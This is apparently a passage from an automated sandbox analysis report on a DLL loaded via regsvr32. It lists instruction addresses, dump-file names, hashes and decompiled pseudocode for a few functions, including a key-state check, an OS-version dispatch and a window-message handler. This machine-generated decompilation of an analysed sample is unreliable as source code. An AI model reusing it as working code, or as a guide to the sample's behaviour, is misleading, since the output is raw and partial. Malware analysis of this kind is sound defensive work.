                                                                        0x1000de50
                                                                        0x1000de51
                                                                        0x1000de52
                                                                        0x1000de53
                                                                        0x1000de53
                                                                        0x1000de54
                                                                        0x1000de54
                                                                        0x1000de58
                                                                        0x1000de5e
                                                                        0x1000de68
                                                                        0x1000de7e
                                                                        0x1000de82
                                                                        0x1000de86
                                                                        0x1000df23
                                                                        0x1000df26
                                                                        0x1000df2c
                                                                        0x1000df2d
                                                                        0x1000df2e
                                                                        0x1000df2f
                                                                        0x1000df39
                                                                        0x1000df3c
                                                                        0x1000df46
                                                                        0x1000df53
                                                                        0x1000df5b
                                                                        0x1000df60
                                                                        0x1000df9a
                                                                        0x1000df9d
                                                                        0x1000dfa4
                                                                        0x1000dfa6
                                                                        0x1000dfb0
                                                                        0x1000dfb6
                                                                        0x1000dfb9
                                                                        0x1000dfba
                                                                        0x1000dfc0
                                                                        0x1000dfc1
                                                                        0x1000dfc3
                                                                        0x1000dfc6
                                                                        0x1000dfca
                                                                        0x1000dfcd
                                                                        0x1000dfd3
                                                                        0x1000dfd4
                                                                        0x1000dfd7
                                                                        0x1000dfdd
                                                                        0x1000dfde
                                                                        0x1000dfe1
                                                                        0x1000dfe4
                                                                        0x1000dfe9
                                                                        0x00000000
                                                                        0x1000de88
                                                                        0x1000de88
                                                                        0x1000de8b
                                                                        0x1000de8d
                                                                        0x1000de92
                                                                        0x1000de92
                                                                        0x1000de95
                                                                        0x1000de95
                                                                        0x1000de97
                                                                        0x1000de9c
                                                                        0x1000de9f
                                                                        0x1000de9f
                                                                        0x1000dea0
                                                                        0x1000dea3
                                                                        0x1000df03
                                                                        0x1000df03
                                                                        0x1000df06
                                                                        0x1000df0b
                                                                        0x1000df0e
                                                                        0x1000df13
                                                                        0x00000000
                                                                        0x1000df18
                                                                        0x1000dd80
                                                                        0x1000dd80
                                                                        0x1000dd8a
                                                                        0x1000dd95
                                                                        0x1000dd9e
                                                                        0x1000dda6
                                                                        0x1000ddae
                                                                        0x1000ddb5
                                                                        0x1000ddc7
                                                                        0x1000ddca
                                                                        0x1000ddd0
                                                                        0x1000ddfa
                                                                        0x1000ddff
                                                                        0x00000000
                                                                        0x1000ddff
                                                                        0x1000dd28
                                                                        0x1000dd31
                                                                        0x1000dd36
                                                                        0x1000dd39
                                                                        0x1000dd3f
                                                                        0x1000dd49
                                                                        0x1000dd6a
                                                                        0x1000dd6f
                                                                        0x1000dfec
                                                                        0x1000dfec
                                                                        0x1000dff3
                                                                        0x1000dff6
                                                                        0x1000dffa
                                                                        0x00000000
                                                                        0x1000dffa
                                                                        0x1000dd26
                                                                        0x1000dd1a
                                                                        0x00000000
                                                                        0x1000dd0f
                                                                        0x1000e002
                                                                        0x1000e005
                                                                        0x1000e06a
                                                                        0x1000e06d
                                                                        0x1000e071
                                                                        0x1000e07b
                                                                        0x1000e091
                                                                        0x1000e094
                                                                        0x1000e096
                                                                        0x1000e098
                                                                        0x1000e09b
                                                                        0x1000e0ed
                                                                        0x1000e105
                                                                        0x1000e10a
                                                                        0x1000e10c
                                                                        0x1000e10e
                                                                        0x1000e111
                                                                        0x1000e117
                                                                        0x1000e117
                                                                        0x1000e11a
                                                                        0x1000e11d
                                                                        0x00000000
                                                                        0x1000e09d
                                                                        0x1000e09d
                                                                        0x1000e0a0
                                                                        0x1000e0a5
                                                                        0x1000e0a5
                                                                        0x1000e0a8
                                                                        0x1000e0a8
                                                                        0x1000e0aa
                                                                        0x1000e0af
                                                                        0x1000e0b0
                                                                        0x1000e0b3
                                                                        0x1000e0b6
                                                                        0x1000e0b9
                                                                        0x1000e0b9
                                                                        0x1000e0b9
                                                                        0x1000e0bb
                                                                        0x1000e0be
                                                                        0x1000e0c3
                                                                        0x1000e0c6
                                                                        0x1000e0cc
                                                                        0x00000000
                                                                        0x1000e0cc
                                                                        0x1000e007
                                                                        0x1000e007
                                                                        0x1000e00b
                                                                        0x1000e010
                                                                        0x1000e012
                                                                        0x1000e015
                                                                        0x1000e066
                                                                        0x00000000
                                                                        0x1000e017
                                                                        0x1000e017
                                                                        0x1000e019
                                                                        0x1000e01c
                                                                        0x1000e021
                                                                        0x1000e021
                                                                        0x1000e024
                                                                        0x1000e024
                                                                        0x1000e026
                                                                        0x1000e02b
                                                                        0x1000e02c
                                                                        0x1000e02f
                                                                        0x1000e032
                                                                        0x1000e024
                                                                        0x1000e035
                                                                        0x1000e038
                                                                        0x1000e03d
                                                                        0x1000e040
                                                                        0x1000e045
                                                                        0x1000e048
                                                                        0x1000e04c
                                                                        0x1000e052
                                                                        0x00000000
                                                                        0x1000e052
                                                                        0x1000e015
                                                                        0x1000dcd8
                                                                        0x1000dcd8
                                                                        0x1000dcdb
                                                                        0x1000e0cf
                                                                        0x1000e0cf
                                                                        0x1000e0d2
                                                                        0x1000e0d7
                                                                        0x00000000
                                                                        0x1000e0d7
                                                                        0x1000dc9d
                                                                        0x1000dc9d
                                                                        0x1000dc9d
                                                                        0x1000dca0
                                                                        0x1000dca4
                                                                        0x1000e0d9
                                                                        0x1000e0d9
                                                                        0x1000e0de
                                                                        0x1000e0de
                                                                        0x1000e0e1
                                                                        0x1000e0e1
                                                                        0x1000dc42
                                                                        0x1000dc42
                                                                        0x1000dc44
                                                                        0x1000dc4d
                                                                        0x1000dc4d
                                                                        0x1000e123
                                                                        0x1000e123
                                                                        0x1000e126
                                                                        0x1000e12a
                                                                        0x00000000
                                                                        0x1000e12a
                                                                        0x1000dc0a
                                                                        0x1000dc0a
                                                                        0x1000dc0c
                                                                        0x1000dc10
                                                                        0x1000dc15
                                                                        0x1000dc15
                                                                        0x1000dc18
                                                                        0x1000dc1b
                                                                        0x1000dc1f
                                                                        0x1000e054
                                                                        0x1000e054
                                                                        0x1000e059
                                                                        0x1000e059
                                                                        0x1000e05c
                                                                        0x1000e05c
                                                                        0x1000dc08
                                                                        0x1000dbce
                                                                        0x1000dbce
                                                                        0x1000dbd1
                                                                        0x1000dbd5
                                                                        0x1000e12c
                                                                        0x1000e12c
                                                                        0x1000e131
                                                                        0x1000e131
                                                                        0x1000e134
                                                                        0x1000e134
                                                                        0x1000e136
                                                                        0x1000e139
                                                                        0x1000e14c

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: H_prolog
                                                                        • String ID: 4
                                                                        • API String ID: 3519838083-4088798008
                                                                        • Opcode ID: 5263575e4b1b058b75a46fc1a6a149590353ccbef09b746fb6c7b92d3e1635fd
                                                                        • Instruction ID: 1dfa92099b7bbb73699ef0bf43d1d48827835450d39971bd9aeca5f6306c0f37
                                                                        • Opcode Fuzzy Hash: 5263575e4b1b058b75a46fc1a6a149590353ccbef09b746fb6c7b92d3e1635fd
                                                                        • Instruction Fuzzy Hash: 8412D071D04245EFEB09DFA4D884AAEBBB1EF44350F25819AF805AF296C771ED40CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1003437E Relevance: 3.0, APIs: 2, Instructions: 40keyboardCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E1003437E(void* __ecx, signed int _a4, intOrPtr _a8) {
				void* __ebx;
				void* _t12;
				signed char _t15;
				void* _t20;

				_t20 = __ecx;
				_t15 = E100202AB(__ecx);
				if(_t15 >= 0 || (_a4 & 0x0000fff0) == 0xf060 && (GetKeyState(0x73) >= 0 || GetKeyState(0x12) >= 0 || (_t15 & 0x00000001) == 0)) {
					L6:
					return E10031CF0(_t20, _a4, _a8);
				}
				_t12 = E10023123(_t15, _t20, _a4, _a8);
				if(_t12 == 0) {
					goto L6;
				}
				return _t12;
			}







                                                                        0x10034384
                                                                        0x1003438b
                                                                        0x1003438f
                                                                        0x100343ce
                                                                        0x00000000
                                                                        0x100343d6
                                                                        0x100343c5
                                                                        0x100343cc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100343df

                                                                        APIs
                                                                          • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                        • GetKeyState.USER32 ref: 100343A8
                                                                        • GetKeyState.USER32 ref: 100343B1
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: State$LongWindow
                                                                        • String ID:
                                                                        • API String ID: 3716621309-0
                                                                        • Opcode ID: e46d5ed39ef6eba03a240f36095f9537e57856947293e986ff7d6bf58ee9c2d0
                                                                        • Instruction ID: 5de781b028f8a4fce12e3c0fa49c43aff6f22c7add5c7a501000866edff81116
                                                                        • Opcode Fuzzy Hash: e46d5ed39ef6eba03a240f36095f9537e57856947293e986ff7d6bf58ee9c2d0
                                                                        • Instruction Fuzzy Hash: FFF02B3A20021F6EDB13AA55CC81FA93A55DF406E1F024135FD04AF252DE71EE129290
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10001100 Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 58%
                                                                        			E10001100() {
				struct _OSVERSIONINFOA _v148;
				long _t6;

				_v148.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v148);
				if(_v148.dwPlatformId != 2) {
					L2:
					_t6 = E10001090;
				} else {
					_t6 = E100010F0;
					if(_v148.dwMajorVersion < 5) {
						goto L2;
					}
				}
				InterlockedExchange(0x1004b0a0, _t6);
				return  *0x1004b0a0();
			}





                                                                        0x1000110a
                                                                        0x10001112
                                                                        0x1000111d
                                                                        0x1000112b
                                                                        0x1000112b
                                                                        0x1000111f
                                                                        0x10001124
                                                                        0x10001129
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10001129
                                                                        0x10001136
                                                                        0x10001148

                                                                        APIs
                                                                        • GetVersionExA.KERNEL32 ref: 10001112
                                                                        • InterlockedExchange.KERNEL32(1004B0A0,10001090), ref: 10001136
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ExchangeInterlockedVersion
                                                                        • String ID:
                                                                        • API String ID: 2700998522-0
                                                                        • Opcode ID: 260be64d31472810d38a7c4b3362e1b1b4b1187a9832a1863536309ce5a7bdb4
                                                                        • Instruction ID: cbef01c832245ed46ef0d161ca004d6dcd336c7d999a9848a1027e40418eb20f
                                                                        • Opcode Fuzzy Hash: 260be64d31472810d38a7c4b3362e1b1b4b1187a9832a1863536309ce5a7bdb4
                                                                        • Instruction Fuzzy Hash: E8E08C304043889FF320EB24CD48B9E76F5FB08282FC04828F2A5C200AD734494ACB47
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10023973 Relevance: 1.9, APIs: 1, Instructions: 440COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 22%
                                                                        			E10023973(intOrPtr* __ecx) {
				signed int _t141;
				signed int _t146;
				signed int _t148;
				signed int _t149;
				unsigned int _t150;
				signed int _t152;
				signed int _t156;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				unsigned int _t163;
				signed int _t167;
				signed int _t171;
				unsigned int _t174;
				signed int _t175;
				signed int _t179;
				signed int _t180;
				signed int* _t184;
				signed int _t186;
				signed int _t194;
				unsigned int _t204;
				void* _t206;

				_t187 = __ecx;
				E10011BF0(0x1003a61c, _t206);
				 *(_t206 - 0x10) =  *(_t206 - 0x10) & 0x00000000;
				_t179 =  *(_t206 + 8);
				_t201 = __ecx;
				if(_t179 != 0x111) {
					if(_t179 != 0x4e) {
						_t204 =  *(_t206 + 0x10);
						if(_t179 == 6) {
							E100233A0(_t187, _t201,  *((intOrPtr*)(_t206 + 0xc)), E100220EE(_t206, _t204));
						}
						if(_t179 != 0x20) {
							L10:
							_t141 =  *(_t201 + 0x48);
							if(_t141 == 0) {
								L19:
								_t180 =  *((intOrPtr*)( *_t201 + 0x28))();
								 *(_t206 - 0x14) = _t180;
								E10037A1B(7);
								_t184 = 0x1004d5f8 + (((_t180 ^  *(_t206 + 8)) & 0x000001ff) + ((_t180 ^  *(_t206 + 8)) & 0x000001ff) * 2) * 4;
								_t146 =  *(_t206 - 0x14);
								if( *(_t206 + 8) !=  *_t184) {
									L24:
									 *_t184 =  *(_t206 + 8);
									_t184[2] = _t146;
									while(1) {
										if(_t146 == 0) {
											break;
										}
										_t147 =  *(_t206 - 0x14);
										_push(0);
										_push(0);
										if( *(_t206 + 8) >= 0xc000) {
											_t148 =  *(_t147 + 4);
											while(1) {
												_push(0xc000);
												_push(_t148);
												_t149 = E10020CD3();
												 *(_t206 + 0x10) = _t149;
												if(_t149 == 0) {
													break;
												}
												_t150 =  *(_t206 + 0x10);
												_t152 =  *(_t206 + 0x10);
												if( *((intOrPtr*)( *((intOrPtr*)(_t150 + 0x10)))) ==  *(_t206 + 8)) {
													_t184[1] = _t152;
													E10037A7E(7);
													L105:
													_t156 =  *((intOrPtr*)( *((intOrPtr*)( *(_t206 + 0x10) + 0x14))))( *((intOrPtr*)(_t206 + 0xc)), _t204);
													L106:
													 *(_t206 - 0x10) = _t156;
													goto L107;
												}
												_push(0);
												_push(0);
												_t148 = _t152 + 0x18;
											}
											L34:
											_t146 =  *( *(_t206 - 0x14));
											 *(_t206 - 0x14) = _t146;
											continue;
										}
										_push( *(_t206 + 8));
										_push( *(_t147 + 4));
										_t161 = E10020CD3();
										 *(_t206 + 0x10) = _t161;
										if(_t161 == 0) {
											goto L34;
										}
										_t184[1] = _t161;
										E10037A7E(7);
										L28:
										_t163 =  *(_t206 + 0x10);
										_t184 =  *(_t163 + 0x14);
										_t147 =  *(_t163 + 0x10);
										_t194 =  *(_t163 + 0x10) - 1;
										if(_t194 > 0x40) {
											goto L107;
										}
										switch( *((intOrPtr*)(_t194 * 4 +  &M10023E7A))) {
											case 0:
												_push( *(__ebp + 0xc));
												_push(E10029068());
												goto L55;
											case 1:
												_push( *(__ebp + 0xc));
												goto L55;
											case 2:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = E100220EE(__ebp,  *(__ebp + 0xc));
												goto L59;
											case 3:
												_push(__esi);
												__eax = E100220EE(__ebp,  *(__ebp + 0xc));
												goto L84;
											case 4:
												_push(__esi);
												L55:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 5:
												__ecx = __ebp - 0x24;
												E10028C26(__ebp - 0x24) =  *(__esi + 4);
												 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
												__ecx = __ebp - 0x74;
												 *(__ebp - 0x20) =  *(__esi + 4);
												__eax = E10021613(__ebp - 0x74, __eflags);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												_push(__eax);
												 *(__ebp - 4) = 1;
												 *(__ebp - 0x58) = __eax;
												__eax = E10022115();
												__eflags = __eax;
												if(__eax == 0) {
													__eax =  *(__edi + 0x48);
													__eflags = __eax;
													if(__eax != 0) {
														__ecx = __eax + 0x20;
														__eax = E1001E69B(__eax + 0x20,  *(__ebp - 0x58));
														__eflags = __eax;
														if(__eax != 0) {
															 *(__ebp - 0x28) = __eax;
														}
													}
													__eax = __ebp - 0x74;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x24;
												_push(__ebp - 0x24);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x20) =  *(__ebp - 0x20) & 0x00000000;
												 *(__ebp - 0x58) =  *(__ebp - 0x58) & 0x00000000;
												__ecx = __ebp - 0x74;
												 *(__ebp - 0x10) = __ebp - 0x24;
												 *(__ebp - 4) = 0;
												__eax = E10022977(__ebp - 0x74);
												goto L51;
											case 6:
												__ecx = __ebp - 0x24;
												E10028C26(__ebp - 0x24) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x20) =  *(__esi + 4);
												__eax = __ebp - 0x24;
												_push(__ebp - 0x24);
												__ecx = __edi;
												 *(__ebp - 4) = 2;
												__eax =  *__ebx();
												_t89 = __ebp - 0x20;
												 *_t89 =  *(__ebp - 0x20) & 0x00000000;
												__eflags =  *_t89;
												 *(__ebp - 0x10) = __ebp - 0x24;
												L51:
												 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
												__ecx = __ebp - 0x24;
												__eax = E100290DE(__ebp - 0x24);
												goto L107;
											case 7:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E100220EE(__ebp, __esi);
												goto L58;
											case 8:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L84;
											case 9:
												_push(__esi);
												_push( *(__ebp + 0xc));
												goto L85;
											case 0xa:
												_push(__esi);
												_push(E10026280());
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												L58:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L59:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0xb:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L107;
											case 0xc:
												_push( *(__ebp + 0xc));
												goto L91;
											case 0xd:
												_push(__esi);
												goto L88;
											case 0xe:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L63;
											case 0xf:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												goto L63;
											case 0x10:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L95;
											case 0x11:
												_push(E100220EE(__ebp, __esi));
												L88:
												_push( *(__ebp + 0xc));
												goto L89;
											case 0x12:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x13:
												_push(E100220EE(__ebp,  *(__ebp + 0xc)));
												_push(E100220EE(__ebp, __esi));
												__eax = 0;
												__eflags =  *((intOrPtr*)(__edi + 0x1c)) - __esi;
												_t107 =  *((intOrPtr*)(__edi + 0x1c)) == __esi;
												__eflags = _t107;
												__eax = 0 | _t107;
												goto L67;
											case 0x14:
												_push( *(__ebp + 0xc));
												__eax = E10029068();
												goto L69;
											case 0x15:
												_push( *(__ebp + 0xc));
												__eax = E10026280();
												goto L69;
											case 0x16:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												_push( *(__ebp + 0xc));
												__eax = E10026280();
												goto L67;
											case 0x17:
												_push( *(__ebp + 0xc));
												goto L74;
											case 0x18:
												_push(__esi);
												L74:
												__eax = E100220EE(__ebp);
												L69:
												_push(__eax);
												goto L91;
											case 0x19:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L77;
											case 0x1a:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L77:
												_push(__eax);
												__eax = E100220EE(__ebp,  *(__ebp + 0xc));
												goto L67;
											case 0x1b:
												_push(__esi);
												__eax = E100220EE(__ebp,  *(__ebp + 0xc));
												L63:
												_push(__eax);
												goto L89;
											case 0x1c:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E100220EE(__ebp, __esi);
												goto L93;
											case 0x1d:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax - 0x27;
												__ecx = __cx;
												 *((intOrPtr*)(__ebp + 8)) = __cx;
												 *(__ebp + 0xc) = __cx;
												if(__eax != 0x27) {
													_push( *(__ebp + 0xc));
													_push( *((intOrPtr*)(__ebp + 8)));
													L89:
													__ecx = __edi;
													__eax =  *__ebx();
													goto L107;
												}
												_push(E100220EE(__ebp, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L96;
											case 0x1e:
												_push(__esi);
												L91:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L107;
											case 0x1f:
												_push(__esi);
												_push( *(__ebp + 0xc));
												__ecx = __edi;
												__eax =  *__ebx();
												goto L98;
											case 0x20:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L84:
												_push(__eax);
												L85:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x21:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												L93:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L67:
												_push(__eax);
												goto L96;
											case 0x22:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L95:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L96:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L107;
											case 0x23:
												__eax = __si & 0x0000ffff;
												_push(__esi);
												_push(__si & 0x0000ffff);
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L100:
												__eflags = _t175;
												if(_t175 != 0) {
													goto L107;
												}
												goto L37;
											case 0x24:
												goto L107;
											case 0x25:
												__ecx = __edi;
												__eax =  *__ebx();
												__eflags = __eax;
												 *(__ebp - 0x10) = __eax;
												if(__eax == 0) {
													goto L107;
												}
												L37:
												_t159 = 0;
												__eflags = 0;
												goto L38;
										}
									}
									_t54 =  &(_t184[1]);
									 *_t54 = _t184[1] & _t146;
									E10037A7E(7);
									goto L37;
								}
								if(_t146 != _t184[2]) {
									goto L24;
								}
								_t186 = _t184[1];
								 *(_t206 + 0x10) = _t186;
								E10037A7E(7);
								if(_t186 == 0) {
									goto L37;
								}
								if( *(_t206 + 8) < 0xc000) {
									goto L28;
								}
								goto L105;
							}
							if( *(_t141 + 0x70) <= 0) {
								goto L19;
							}
							if(_t179 < 0x200) {
								L14:
								if(_t179 < 0x100) {
									L16:
									if(_t179 < 0x281) {
										goto L19;
									}
									if(_t179 > 0x291) {
										goto L19;
									}
									L18:
									_t167 =  *((intOrPtr*)( *( *(_t201 + 0x48)) + 0x94))(_t179,  *((intOrPtr*)(_t206 + 0xc)), _t204, _t206 - 0x10);
									if(_t167 != 0) {
										goto L107;
									}
									goto L19;
								}
								if(_t179 <= 0x10f) {
									goto L18;
								}
								goto L16;
							}
							if(_t179 <= 0x209) {
								goto L18;
							}
							goto L14;
						} else {
							_t171 = E10023401(_t201, _t204, _t204 >> 0x10);
							if(_t171 != 0) {
								L98:
								 *(_t206 - 0x10) = 1;
								L107:
								_t157 =  *(_t206 + 0x14);
								if(_t157 != 0) {
									 *_t157 =  *(_t206 - 0x10);
								}
								_t159 = 1;
								L38:
								 *[fs:0x0] =  *((intOrPtr*)(_t206 - 0xc));
								return _t159;
							}
							goto L10;
						}
					}
					_t174 =  *(_t206 + 0x10);
					if( *_t174 == 0) {
						goto L37;
					}
					_push(_t206 - 0x10);
					_push(_t174);
					_push( *((intOrPtr*)(_t206 + 0xc)));
					_t175 =  *((intOrPtr*)( *__ecx + 0xec))();
					goto L100;
				}
				_push( *(_t206 + 0x10));
				_push( *((intOrPtr*)(_t206 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0xe8))() == 0) {
					goto L37;
				}
				goto L98;
			}

























                                                                        0x10023973
                                                                        0x10023978
                                                                        0x10023980
                                                                        0x10023985
                                                                        0x10023990
                                                                        0x10023992
                                                                        0x100239b2
                                                                        0x100239da
                                                                        0x100239dd
                                                                        0x100239ea
                                                                        0x100239ea
                                                                        0x100239f2
                                                                        0x10023a0c
                                                                        0x10023a0c
                                                                        0x10023a11
                                                                        0x10023a65
                                                                        0x10023a6c
                                                                        0x10023a6e
                                                                        0x10023a7c
                                                                        0x10023a87
                                                                        0x10023a90
                                                                        0x10023a93
                                                                        0x10023abd
                                                                        0x10023ac0
                                                                        0x10023ac2
                                                                        0x10023b4c
                                                                        0x10023b4e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023ad1
                                                                        0x10023ad4
                                                                        0x10023ad6
                                                                        0x10023ad8
                                                                        0x10023b12
                                                                        0x10023b32
                                                                        0x10023b32
                                                                        0x10023b37
                                                                        0x10023b38
                                                                        0x10023b3f
                                                                        0x10023b42
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023b17
                                                                        0x10023b22
                                                                        0x10023b25
                                                                        0x10023e4d
                                                                        0x10023e50
                                                                        0x10023e55
                                                                        0x10023e61
                                                                        0x10023e63
                                                                        0x10023e63
                                                                        0x00000000
                                                                        0x10023e63
                                                                        0x10023b2b
                                                                        0x10023b2d
                                                                        0x10023b2f
                                                                        0x10023b2f
                                                                        0x10023b44
                                                                        0x10023b47
                                                                        0x10023b49
                                                                        0x00000000
                                                                        0x10023b49
                                                                        0x10023ada
                                                                        0x10023add
                                                                        0x10023ae0
                                                                        0x10023ae7
                                                                        0x10023aea
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023aee
                                                                        0x10023af1
                                                                        0x10023af6
                                                                        0x10023af6
                                                                        0x10023af9
                                                                        0x10023afc
                                                                        0x10023aff
                                                                        0x10023b05
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023b0b
                                                                        0x00000000
                                                                        0x10023b71
                                                                        0x10023b79
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023b7f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023b98
                                                                        0x10023b99
                                                                        0x10023b9c
                                                                        0x10023ba0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023baa
                                                                        0x10023bae
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023c7e
                                                                        0x10023c7f
                                                                        0x10023c7f
                                                                        0x10023c81
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023bb8
                                                                        0x10023bc0
                                                                        0x10023bc3
                                                                        0x10023bc7
                                                                        0x10023bca
                                                                        0x10023bcd
                                                                        0x10023bd2
                                                                        0x10023bd4
                                                                        0x10023bd7
                                                                        0x10023bd8
                                                                        0x10023bdc
                                                                        0x10023bdf
                                                                        0x10023be4
                                                                        0x10023be6
                                                                        0x10023be8
                                                                        0x10023beb
                                                                        0x10023bed
                                                                        0x10023bf2
                                                                        0x10023bf5
                                                                        0x10023bfa
                                                                        0x10023bfc
                                                                        0x10023bfe
                                                                        0x10023bfe
                                                                        0x10023bfc
                                                                        0x10023c01
                                                                        0x10023c01
                                                                        0x10023c04
                                                                        0x10023c05
                                                                        0x10023c06
                                                                        0x10023c09
                                                                        0x10023c0a
                                                                        0x10023c0c
                                                                        0x10023c0e
                                                                        0x10023c12
                                                                        0x10023c16
                                                                        0x10023c19
                                                                        0x10023c1c
                                                                        0x10023c20
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023c27
                                                                        0x10023c2f
                                                                        0x10023c32
                                                                        0x10023c35
                                                                        0x10023c38
                                                                        0x10023c3b
                                                                        0x10023c3c
                                                                        0x10023c3e
                                                                        0x10023c45
                                                                        0x10023c47
                                                                        0x10023c47
                                                                        0x10023c47
                                                                        0x10023c4b
                                                                        0x10023c4e
                                                                        0x10023c4e
                                                                        0x10023c52
                                                                        0x10023c55
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10023c62
